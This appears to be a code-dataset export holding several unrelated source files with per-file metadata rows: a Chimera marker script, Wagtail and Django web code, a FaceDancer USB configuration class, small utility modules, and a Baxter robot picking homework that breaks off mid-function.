mark=s.place_marker((469.749, 551.597, 573.654), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((482.386, 557.336, 599.018), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((501.788, 551.486, 619.309), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((519.213, 549.9, 641.465), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((501.823, 528.275, 560.158), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((531.577, 572.343, 724.916), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((465.272, 527.711, 531.944), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((443.024, 528.618, 547.572), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((394.808, 534.128, 579.598), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((347.325, 537.717, 610.921), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((346.237, 612.866, 581.185), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((285.188, 485.681, 675.893), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((431.669, 554.157, 528.891), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((418.813, 538.895, 509.604), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((401.07, 525.818, 492.816), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((377.354, 511.237, 492.115), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((363.701, 506.923, 516.183), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((370.113, 487.034, 535.024), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((423.519, 544.779, 554.472), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((316.034, 429.079, 515.475), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
332a6d9bcc8114a3fcffb46b452697f41f952e04 | eee51854656ede694c121c7102cd2e737ea7e702 | /demo/api.py | 7746564cca4056932d685fcbb13988dcbb3db79d | [] | no_license | degerli/betahealth-wagtail-demo | cb99f26219fede384a44e3af5e597de40c1ab1e2 | 1cb16c2fdc877778e645bdb11ba69f6418900e26 | refs/heads/master | 2020-04-23T04:03:47.038341 | 2016-10-05T09:05:40 | 2016-10-05T09:05:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,187 | py | from django.core.urlresolvers import reverse
from rest_framework import serializers
from wagtail.api.v2.endpoints import PagesAPIEndpoint as WagtailPagesAPIEndpoint
from wagtail.api.v2.router import WagtailAPIRouter
from wagtail.wagtailimages.api.v2.endpoints import ImagesAPIEndpoint as WagtailImagesAPIEndpoint
from wagtail.wagtailimages.api.v2.serializers import ImageSerializer as WagtailImageSerializer
from wagtail.wagtailimages.utils import generate_signature
from wagtail.wagtaildocs.api.v2.endpoints import DocumentsAPIEndpoint
api_router = WagtailAPIRouter('wagtailapi')
class PagesAPIEndpoint(WagtailPagesAPIEndpoint):
meta_fields = WagtailPagesAPIEndpoint.meta_fields + [
'url_path'
]
listing_default_fields = WagtailPagesAPIEndpoint.listing_default_fields + [
'url_path'
]
def generate_image_url(image, filter_spec):
signature = generate_signature(image.id, filter_spec)
url = reverse('wagtailimages_serve', args=(signature, image.id, filter_spec))
# Append image's original filename to the URL (optional)
url += image.file.name[len('original_images/'):]
return url
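# Illustrative: generate_image_url(img, 'width-400') yields something like
# '/images/<signature>/<image-id>/width-400/photo.jpg' (the exact prefix
# depends on how 'wagtailimages_serve' is routed in the project's urls.py).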
class ImageSerializer(WagtailImageSerializer):
def _get_url_x(self, obj, width):
return generate_image_url(obj, 'width-{}'.format(width))
def get_url_400(self, obj):
return self._get_url_x(obj, 400)
def get_url_640(self, obj):
return self._get_url_x(obj, 640)
def get_url_800(self, obj):
return self._get_url_x(obj, 800)
def get_url_1280(self, obj):
return self._get_url_x(obj, 1280)
url_400 = serializers.SerializerMethodField()
url_640 = serializers.SerializerMethodField()
url_800 = serializers.SerializerMethodField()
url_1280 = serializers.SerializerMethodField()
class ImagesAPIEndpoint(WagtailImagesAPIEndpoint):
base_serializer_class = ImageSerializer
meta_fields = WagtailImagesAPIEndpoint.meta_fields + [
'url_400', 'url_640', 'url_800', 'url_1280'
]
api_router.register_endpoint('pages', PagesAPIEndpoint)
api_router.register_endpoint('images', ImagesAPIEndpoint)
api_router.register_endpoint('documents', DocumentsAPIEndpoint)
| [
"[email protected]"
] | |
c30d008b2918bfa5283316eabf5fe2b6a9f523b6 | d857b65117378d9f35eb062bd1d2ddbb87f11709 | /shows_app/urls.py | 53313358ebf3b9d517d23b37c79a6065b06303d1 | [] | no_license | JesusGarcia86/shows_proj | e2bd646df88e8380a6bbebebc073cd8f59520be7 | 3e6ad462d603d78241b259a6ff713e1f08b6201e | refs/heads/main | 2023-03-21T22:07:34.029715 | 2021-03-15T16:27:41 | 2021-03-15T16:27:41 | 348,043,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('shows/', views.index),
path('new', views.new),
path('shows/create', views.create),
path('<int:show_id>/edit', views.edit),
path('shows/<int:show_id>/update', views.update),
path('<int:show_id>', views.show),
path('<int:show_id>/delete', views.delete),
]
# ==== facedancer/future/configuration.py | repo: walidbarakat/Facedancer | license: BSD-3-Clause ====
#
# This file is part of FaceDancer.
#
""" Functionality for describing USB device configurations. """
from dataclasses import dataclass, field
from typing import Iterable
from .types import USBDirection
from .magic import instantiate_subordinates, AutoInstantiable
from .request import USBRequestHandler
from .interface import USBInterface
from .descriptor import USBDescribable
from .endpoint import USBEndpoint
@dataclass
class USBConfiguration(USBDescribable, AutoInstantiable, USBRequestHandler):
""" Class representing a USBDevice's configuration.
Fields:
number -- The configuration's number; one-indexed.
configuration_string -- A string describing the configuration; or None if not provided.
max_power -- The maximum power expected to be drawn by the device when using
this configuration, in mA. Typically 500mA, for maximum possible.
supports_remote_wakeup -- True iff this device should be able to wake the host from suspend.
"""
DESCRIPTOR_TYPE_NUMBER = 0x02
DESCRIPTOR_SIZE_BYTES = 9
number : int = 1
configuration_string : str = None
max_power : int = 500
self_powered : bool = True
supports_remote_wakeup : bool = True
parent : USBDescribable = None
interfaces : USBInterface = field(default_factory=dict)
def __post_init__(self):
# Gather any interfaces defined on the object.
self.interfaces.update(instantiate_subordinates(self, USBInterface))
@property
def attributes(self):
""" Retrives the "attributes" composite word. """
# Start off with the required bits set to one...
attributes = 0b10000000
# ... and then add in our attributes.
attributes |= (1 << 6) if self.self_powered else 0
attributes |= (1 << 5) if self.supports_remote_wakeup else 0
return attributes
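# Worked example: with the defaults above (self_powered=True and
# supports_remote_wakeup=True) this returns
# 0b10000000 | (1 << 6) | (1 << 5) == 0b11100000 == 0xE0.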
#
# User API.
#
def get_device(self):
""" Returns a reference to the associated device."""
return self.parent
def add_interface(self, interface: USBInterface):
""" Adds an interface to the configuration. """
self.interfaces[interface.number] = interface
interface.parent = self
def get_endpoint(self, number: int, direction: USBDirection) -> USBEndpoint:
""" Attempts to find an endpoint with the given number + direction.
Parameters:
number -- The endpoint number to look for.
direction -- Whether to look for an IN or OUT endpoint.
"""
# Search each of our interfaces for the relevant endpoint.
for interface in self.interfaces.values():
endpoint = interface.get_endpoint(number, direction)
if endpoint is not None:
return endpoint
# If none have one, return None.
return None
#
# Event handlers.
#
def handle_data_received(self, endpoint: USBEndpoint, data: bytes):
""" Handler for receipt of non-control request data.
Typically, this method will delegate any data received to the
appropriate configuration/interface/endpoint. If overridden, the
overriding function will receive all data; and can delegate it by
calling the `.handle_data_received` method on `self.configuration`.
Parameters:
endpoint -- The endpoint on which the data was received.
data -- The raw bytes received on the relevant endpoint.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.OUT):
interface.handle_data_received(endpoint, data)
return
# If no interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_received(endpoint.number, data)
def handle_data_requested(self, endpoint: USBEndpoint):
""" Handler called when the host requests data on a non-control endpoint.
Typically, this method will delegate the request to the appropriate
interface+endpoint. If overridden, the overriding function will receive
all data.
Parameters:
endpoint_number -- The endpoint number on which the host requested data.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_data_requested(endpoint)
return
# If no interface owned the targeted endpoint, consider the data unexpected.
self.get_device().handle_unexpected_data_requested(endpoint.number)
def handle_buffer_empty(self, endpoint: USBEndpoint):
""" Handler called when a given endpoint first has an empty buffer.
Often, an empty buffer indicates an opportunity to queue data
for sending ('prime an endpoint'), but doesn't necessarily mean
that the host is planning on reading the data.
This function is called only once per buffer.
"""
for interface in self.interfaces.values():
if interface.has_endpoint(endpoint.number, direction=USBDirection.IN):
interface.handle_buffer_empty(endpoint)
return
#
# Backend interface functions.
#
def get_interfaces(self) -> Iterable[USBInterface]:
""" Returns an iterable over all interfaces on the provided device. """
return self.interfaces.values()
def get_descriptor(self) -> bytes:
""" Returns this configurations's configuration descriptor, including subordinates. """
interface_descriptors = bytearray()
# FIXME: use construct
# Add all subordinate descriptors together to create one big subordinate descriptor.
interfaces = sorted(self.interfaces.values(), key=lambda item: item.number)
for interface in interfaces:
interface_descriptors += interface.get_descriptor()
total_len = len(interface_descriptors) + 9
string_manager = self.get_device().strings
# Build the core configuration descriptor.
d = bytes([
9, # length of descriptor in bytes
2, # descriptor type 2 == configuration
total_len & 0xff,
(total_len >> 8) & 0xff,
len(set(interface.number for interface in self.interfaces.values())),
self.number,
string_manager.get_index(self.configuration_string),
self.attributes,
self.max_power // 2
])
return d + interface_descriptors
#
# Interfacing functions for AutoInstantiable.
#
def get_identifier(self) -> int:
return self.number
#
# Backend functions for our RequestHandler class.
#
def _request_handlers(self) -> Iterable[callable]:
return ()
def _get_subordinate_handlers(self) -> Iterable[USBInterface]:
return self.interfaces.values()
# ==== WebKit/Tools/Scripts/webkitpy/common/watchlist/changedlinepattern.py | repo: adzhou/oragle | license: BSL-1.0 ====
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
class ChangedLinePattern:
def __init__(self, compile_regex, index_for_zero_value):
self._regex = compile_regex
self._index_for_zero_value = index_for_zero_value
def match(self, path, diff_file):
for diff_line in diff_file:
if diff_line[self._index_for_zero_value]:
continue
if self._regex.search(diff_line[2]):
return True
return False
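# Illustrative usage only (the diff tuples below are hypothetical; in
# webkitpy, match() is normally driven by the watchlist machinery):
#
# import re
# pattern = ChangedLinePattern(re.compile(r'ASSERT\('), 0)
# diff_file = [(0, 12, 'ASSERT(foo);')] # (deleted line no., added line no., text)
# pattern.match('Source/WebCore/foo.cpp', diff_file) # returns True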
# ==== ceres/__init__.py | repo: signingup/ceres-combineharvester | license: Apache-2.0 ====
from pkg_resources import DistributionNotFound, get_distribution, resource_filename
try:
__version__ = get_distribution("ceres-blockchain").version
except DistributionNotFound:
# package is not installed
__version__ = "unknown"
PYINSTALLER_SPEC_PATH = resource_filename("ceres", "pyinstaller.spec")
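# The same pkg_resources lookup pattern works for any installed distribution;
# the distribution name below is only an example:
#
# try:
#     other_version = get_distribution("setuptools").version
# except DistributionNotFound:
#     other_version = "unknown"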
# ==== res/scripts/client/gui/shared/fortifications/events_dispatcher.py | repo: Difrex/wotsdk | license: none ====
# Embedded file name: scripts/client/gui/shared/fortifications/events_dispatcher.py
from gui.shared import g_eventBus, events, EVENT_BUS_SCOPE
from gui.Scaleform.genConsts.FORTIFICATION_ALIASES import FORTIFICATION_ALIASES
def showFortBattleRoomWindow():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_BATTLE_ROOM_WINDOW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def showBattleConsumesIntro():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORT_COMBAT_RESERVES_INTRO_ALIAS), EVENT_BUS_SCOPE.LOBBY)
def loadFortView():
g_eventBus.handleEvent(events.LoadViewEvent(FORTIFICATION_ALIASES.FORTIFICATIONS_VIEW_ALIAS), EVENT_BUS_SCOPE.LOBBY)
# ==== apc2015/hw4_submissions/miles_aubert/hw4.py | repo: duke-iml/ece490-s2016 | license: none ====
#!/usr/bin/python
from klampt import *
from klampt.glprogram import *
from klampt import vectorops,so3,se3,gldraw,ik,loader,robotcollide
from klampt.robotsim import Geometry3D,SimBody
from baxter import *
from hw4_planner import *
import apc
import os
import math
import random
from threading import Thread,Lock
from Queue import Queue
#configuration variables
#Question 1,2,3: set NO_SIMULATION_COLLISIONS = 1
#Question 4: set NO_SIMULATION_COLLISIONS = 0
NO_SIMULATION_COLLISIONS = 1
#Set FAKE_SIMULATION to 1 to help fast prototyping of later stages.
#You won't have to wait for the arm to move.
FAKE_SIMULATION = 0
#The path of the klampt_models directory
model_dir = "../klampt_models/"
#resting configuration
baxter_rest_config = [0.0]*60
#the transformation of the order bin
order_bin_xform = (so3.identity(),[0.5,0,0])
#the local bounding box of the order bin
order_bin_bounds = ([-0.2,-0.4,0],[0.2,0.4,0.7])
class KnowledgeBase:
"""A structure containing the robot's dynamic knowledge about the world.
Members:
- bin_contents: a map from bin names to lists of known items in
the bin. Items are given by apc.ItemInBin objects.
- order_bin_contents: the list of objects already in the order bin.
also given by apc.ItemInBin objects
- shelf_xform: the transformation (rotation, translation) of the bottom
center of the shelf in world coordinates. The x coordinate increases
from left to right, the y coordinate increases from bottom to top,
and the z coordinate increases from back to front.
this will be loaded dynamically either from perception or hard coded.
(in this homework assignment we will use the fake perception module
to populate the bin contents, and assume the shelf xform is
estimated perfectly.)
"""
def __init__(self):
self.bin_contents = dict((n,None) for n in apc.bin_names)
self.order_bin_contents = []
self.shelf_xform = se3.identity()
def bin_front_center(self,bin_name):
bmin,bmax = apc.bin_bounds[bin_name]
local_center = [(bmin[0]+bmax[0])*0.5,(bmin[1]+bmax[1])*0.5,bmax[2]]
world_center = se3.apply(self.shelf_xform,local_center)
return world_center
def bin_vantage_point(self,bin_name):
world_center = self.bin_front_center(bin_name)
#20cm offset
world_offset = so3.apply(self.shelf_xform[0],[0,0,0.2])
return vectorops.add(world_center,world_offset)
def grasp_xforms(self,object):
if object.xform == None: return None
res = []
for g in object.info.grasps:
grasp_xform_world = se3.mul(object.xform,g.grasp_xform)
res.append((g,grasp_xform_world))
return res
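#hypothetical usage sketch of KnowledgeBase (the bin name here is just an
#example, not part of the assignment spec):
# kb = KnowledgeBase()
# kb.shelf_xform = ground_truth_shelf_xform
# center = kb.bin_front_center('bin_A') #world-frame center of the bin front
# vantage = kb.bin_vantage_point('bin_A') #20cm in front of that center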
#a list of actual items -- this is only used for the fake perception module, and your
#code should not use these items directly
ground_truth_items = []
ground_truth_shelf_xform = se3.identity()
def init_ground_truth():
global ground_truth_items
ground_truth_items = [apc.ItemInBin(apc.tall_item,'bin_B'),
apc.ItemInBin(apc.small_item,'bin_D'),
apc.ItemInBin(apc.med_item,'bin_H')]
ground_truth_items[0].set_in_bin_xform(ground_truth_shelf_xform,0.25,0.2,0.0)
ground_truth_items[1].set_in_bin_xform(ground_truth_shelf_xform,0.5,0.1,math.pi/4)
ground_truth_items[2].set_in_bin_xform(ground_truth_shelf_xform,0.6,0.4,math.pi/2)
def run_perception_on_shelf(knowledge):
"""This is a fake perception module that simply reveals the shelf
xform."""
knowledge.shelf_xform = ground_truth_shelf_xform
def run_perception_on_bin(knowledge,bin_name):
"""This is a fake perception module that simply reveals all the items
the given bin."""
global ground_truth_items
if knowledge.bin_contents[bin_name]==None:
#not sensed yet
knowledge.bin_contents[bin_name] = []
for item in ground_truth_items:
if item.bin_name == bin_name:
#place it in the bin
knowledge.bin_contents[bin_name].append(item)
return
class LowLevelController:
"""A low-level interface to the Baxter robot (with parallel jaw
grippers). Does appropriate locking for multi-threaded use.
You should use this in your picking controller."""
def __init__(self,robotModel,robotController):
self.robotModel = robotModel
self.controller = robotController
self.lock = Lock()
def getSensedConfig(self):
self.lock.acquire()
res = self.controller.getSensedConfig()
self.lock.release()
return res
def getSensedVelocity(self):
self.lock.acquire()
res = self.controller.getSensedVelocity()
self.lock.release()
return res
def getCommandedConfig(self):
self.lock.acquire()
res = self.controller.getCommandedConfig()
self.lock.release()
return res
def getCommandedVelocity(self):
self.lock.acquire()
res = self.controller.getCommandedVelocity()
self.lock.release()
return res
def setPIDCommand(self,configuration,velocity):
"""Sets the controller to a PID command mode"""
self.lock.acquire()
self.controller.setPIDCommand(configuration,velocity)
self.lock.release()
def setMilestone(self,destination,endvelocity=None):
"""Immediately sets the motion queue to move to the given
milestone. If endvelocity is given, then the end of the
queue will be moving at that velocity. Otherwise, the end
velocity will be zero."""
self.lock.acquire()
if endvelocity == None: self.controller.setMilestone(destination)
else: self.controller.setMilestone(destination,endvelocity)
self.lock.release()
def appendMilestone(self,destination,endvelocity=None):
"""Appends a milestone to the motion queue. If endvelocity
is given, then the end of the queue will be moving at that velocity.
Otherwise, the end velocity will be zero."""
self.lock.acquire()
if endvelocity == None: self.controller.appendMilestone(destination)
else: self.controller.appendMilestone(destination,endvelocity)
self.lock.release()
def isMoving(self):
return self.controller.remainingTime()>0
def remainingTime(self):
return self.controller.remainingTime()
def commandGripper(self,limb,command):
"""Sends the command to the indicated gripper.
For the parallel-jaw gripper, [0] is closed, [1] is open
Warning: don't do this while moving"""
self.lock.acquire()
q = self.controller.getCommandedConfig()
self.robotModel.setConfig(q)
value = command[0]
if limb=='left':
print "Opening left gripper to",value
self.robotModel.getDriver(15).setValue(value*0.03)
self.robotModel.getDriver(16).setValue(-value*0.03)
else:
print "Opening right gripper to",value
self.robotModel.getDriver(17).setValue(value*0.03)
self.robotModel.getDriver(18).setValue(-value*0.03)
self.controller.setMilestone(self.robotModel.getConfig())
self.lock.release()
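#illustrative note: because every accessor above takes self.lock, the picking
#thread and the GUI/simulation thread can safely share one instance, e.g.
# q = low_level_controller.getCommandedConfig() #thread-safe snapshot
# low_level_controller.setMilestone(q) #queue a motion from another thread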
class PickingController:
"""Maintains the robot's knowledge base and internal state. Most of
your code will go here. Members include:
- knowledge: a KnowledgeBase object
- planner: an LimbPlanner object, which *you will implement and use*
- state: either 'ready', or 'holding'
- configuration: the robot's current configuration
- active_limb: the limb currently active, either holding or viewing a state
- current_bin: the name of the bin where the camera is viewing or the gripper is located
- held_object: the held object, if one is held, or None otherwise
External modules can call viewBinAction(), graspAction(), ungraspAction(),
and placeInOrderBinAction()
"""
def __init__(self,world,robotController):
self.world = world
self.robot = world.robot(0)
self.controller = robotController
self.knowledge = KnowledgeBase()
self.planner = LimbPlanner(self.world,self.knowledge)
self.state = 'ready'
self.active_limb = None
self.active_grasp = None
self.current_bin = None
self.held_object = None
#these may be helpful
self.left_camera_link = self.robot.getLink(left_camera_link_name)
self.right_camera_link = self.robot.getLink(right_camera_link_name)
self.left_gripper_link = self.robot.getLink(left_gripper_link_name)
self.right_gripper_link = self.robot.getLink(right_gripper_link_name)
self.left_arm_links = [self.robot.getLink(i) for i in left_arm_link_names]
self.right_arm_links = [self.robot.getLink(i) for i in right_arm_link_names]
id_to_index = dict([(self.robot.getLink(i).getID(),i) for i in range(self.robot.numLinks())])
self.left_arm_indices = [id_to_index[i.getID()] for i in self.left_arm_links]
self.right_arm_indices = [id_to_index[i.getID()] for i in self.right_arm_links]
def waitForMove(self,timeout = None, pollRate = 0.5):
"""Waits for the move to complete, or timeout seconds is elapsed,
before terminating."""
iters = 0
t = 0
while self.controller.isMoving():
if iters % 10 == 0:
print "Waiting for move to complete..."
time.sleep(pollRate)
t += pollRate
if timeout != None and t > timeout:
return False
iters += 1
return True
def viewBinAction(self,b):
self.waitForMove()
if self.state != 'ready':
print "Already holding an object, can't move to bin"
return False
else:
if b in apc.bin_names:
if self.move_camera_to_bin(b):
self.waitForMove()
self.current_bin = b
run_perception_on_bin(self.knowledge,b)
print "Sensed bin",b,"with camera",self.active_limb
else:
print "Move to bin",b,"failed"
return False
else:
print "Invalid bin",b
return False
return True
def graspAction(self):
self.waitForMove()
self.controller.commandGripper(self.active_limb,[1])
self.waitForMove()
if self.current_bin == None:
print "Not located at a bin"
return False
elif self.state != 'ready':
print "Already holding an object, can't grasp another"
return False
elif len(self.knowledge.bin_contents[self.current_bin])==0:
print "The current bin is empty"
return False
else:
if self.move_to_grasp_object(self.knowledge.bin_contents[self.current_bin][0]):
self.waitForMove()
#now close the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_close_command)
self.waitForMove()
self.held_object = self.knowledge.bin_contents[self.current_bin].pop(0)
self.state = 'holding'
print "Holding object",self.held_object.info.name,"in hand",self.active_limb
return True
else:
print "Grasp failed"
return False
def ungraspAction(self):
self.waitForMove()
if self.state != 'holding':
print "Not holding an object"
return False
else:
if self.move_to_ungrasp_object(self.held_object):
self.waitForMove()
#now open the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_open_command)
self.waitForMove()
print "Object",self.held_object.info.name,"placed back in bin"
self.knowledge.bin_contents[self.current_bin].append(self.held_object)
self.state = 'ready'
self.held_object = None
return True
else:
print "Ungrasp failed"
return False
def placeInOrderBinAction(self):
self.waitForMove()
if self.state != 'holding':
print "Not holding an object"
else:
if self.move_to_order_bin(self.held_object):
self.waitForMove()
#now open the gripper
self.controller.commandGripper(self.active_limb,self.active_grasp.gripper_open_command)
self.waitForMove()
print "Successfully placed",self.held_object.info.name,"into order bin"
self.knowledge.order_bin_contents.append(self.held_object)
self.held_object.xform = None
self.held_object.bin_name = 'order_bin'
self.state = 'ready'
self.held_object = None
return True
else:
print "Move to order bin failed"
return False
def fulfillOrderAction(self,objectList):
"""Given a list of objects to be put in the order bin, run
until completed."""
remainingObjects = objectList
for b in apc.bin_names:
if self.knowledge.bin_contents[b]==None:
if not self.viewBinAction(b):
print "Could not view bin",b
continue
donextbin = False
while any(o.info.name in remainingObjects for o in self.knowledge.bin_contents[b]) and not donextbin:
#pick up and put down objects until you are holding one that is in the remainingObjects list
if not self.graspAction():
print "Error grasping object"
donextbin = True
break
while not donextbin and (self.held_object == None or self.held_object.info.name not in remainingObjects):
#cycle through objects by putting down and picking up the next object
if not self.ungraspAction():
print "Error putting down object"
return False
if not self.graspAction():
print "Error grasping object"
donextbin = True
break
obj = self.held_object
if self.placeInOrderBinAction():
remainingObjects.remove(obj.info.name)
else:
print "Error putting object into order bin"
return False
if len(remainingObjects)==0:
return True
print "These items are remaining from the order:",remainingObjects
return False
def randomize_limb_position(self,limb,range=None):
"""Helper: randomizes the limb configuration in self.robot.
limb can be 'left' or 'right'. If range is provided, then
this samples in a range around the current commanded config"""
qmin,qmax = self.robot.getJointLimits()
if range == None:
q = baxter_rest_config[:]
if limb == 'left':
for j in self.left_arm_indices:
q[j] = random.uniform(qmin[j],qmax[j])
else:
for j in self.right_arm_indices:
q[j] = random.uniform(qmin[j],qmax[j])
self.robot.setConfig(q)
else:
q = self.controller.getCommandedConfig()
if limb == 'left':
for j in self.left_arm_indices:
q[j] = max(qmin[j],min(qmax[j],random.uniform(q[j]-range,q[j]+range)))
else:
for j in self.right_arm_indices:
q[j] = max(qmin[j],min(qmax[j],random.uniform(q[j]-range,q[j]+range)))
self.robot.setConfig(q)
return
def move_camera_to_bin(self,bin_name):
"""Starts a motion so the camera has a viewpoint that
observes bin_name. Will also change self.active_limb to the
appropriate limb.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
world_offset = self.knowledge.bin_vantage_point(bin_name)
#place +z in the +x axis, y in the +z axis, and x in the -y axis
left_goal = ik.objective(self.left_camera_link,R=[0,0,-1,1,0,0,0,1,0],t=world_offset)
right_goal = ik.objective(self.right_camera_link,R=[0,0,-1,1,0,0,0,1,0],t=world_offset)
qcmd = self.controller.getCommandedConfig()
for i in range(100):
if random.random() < 0.5:
if i == 0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position('left')
if ik.solve(left_goal):
if self.planner.check_collision_free('left'):
self.controller.setMilestone(self.robot.getConfig())
self.active_limb = 'left'
return True
else:
if i == 0:
self.robot.setConfig(qcmd)
else:
self.randomize_limb_position('right')
if ik.solve(right_goal):
if self.planner.check_collision_free('right'):
self.controller.setMilestone(self.robot.getConfig())
self.active_limb = 'right'
return True
return False
def move_to_grasp_object(self,object):
"""Sets the robot's configuration so the gripper grasps object at
one of its potential grasp locations. Might change self.active_limb
to the appropriate limb. Must change self.active_grasp to the
selected grasp.
If successful, sends the motion to the low-level controller and
returns True.
Otherwise, does not modify the low-level controller and returns False.
"""
grasps = self.knowledge.grasp_xforms(object)
qmin,qmax = self.robot.getJointLimits()
qcmd = self.controller.getCommandedConfig()
#phase 1: init IK from the commanded config, search among grasps
for (grasp,gxform) in grasps:
if self.active_limb == 'left':
Tg = se3.mul(gxform,se3.inv(left_gripper_center_xform))
goal = ik.objective(self.left_gripper_link,R=Tg[0],t=Tg[1])
else:
Tg = se3.mul(gxform,se3.inv(right_gripper_center_xform))
goal = ik.objective(self.right_gripper_link,R=Tg[0],t=Tg[1])
self.robot.setConfig(qcmd)
if ik.solve(goal):
self.controller.setMilestone(self.robot.getConfig())
self.active_grasp = grasp
return True
#Phase 2: that didn't work, now try random sampling
for i in range(100):
#pick a config at random
self.randomize_limb_position(self.active_limb)
#pick a grasp at random
(grasp,gxform) = random.choice(grasps)
if self.active_limb == 'left':
Tg = se3.mul(gxform,se3.inv(left_gripper_center_xform))
goal = ik.objective(self.left_gripper_link,R=Tg[0],t=Tg[1])
else:
